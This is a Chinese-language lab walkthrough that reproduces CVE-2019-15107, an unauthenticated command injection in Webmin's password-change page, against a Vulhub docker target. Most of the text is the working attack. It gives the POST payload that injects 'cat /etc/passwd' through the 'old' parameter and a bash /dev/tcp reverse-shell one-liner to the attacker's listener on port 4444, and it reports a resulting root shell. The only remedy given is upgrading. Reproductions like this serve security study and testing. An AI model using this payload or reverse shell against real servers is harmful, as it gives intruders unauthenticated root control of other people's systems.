Webmin未经身份验证的远程代码执行(漏洞复现)
漏洞版本
CVE-2019-15107
漏洞描述
Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。
影响版本:Webmin<=1.920
环境搭建
靶机IP: 192.168.35.143
攻击者IP:192.168.35.128
启动靶机环境
docker-compose build
docker-compose up -d
去访问页面 https://192.168.35.143:10000/
这个页面的端口是10000
在登陆页面抓包
修改POST请求
将请求页面换成:/password_change.cgi
构造poc
user=rootxx&pam=&expired=2&old=test|cat /etc/passwd&new1=test2&new2=test2
发送请求,可以看到 能够执行命令
cat /etc/passwd
所以可以根据远程代码执行漏洞进行反弹shell
反弹shell的脚本为
bash -c "bash -i >& /dev/tcp/192.168.35.128/4444 0>&1"
进行URL编码
发送构造的POST
kali监听4444端口
发现得到shell且用户是root
漏洞修复
更新版本
参考链接
https://vulhub.org/#/environments/webmin/CVE-2019-15107/
https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html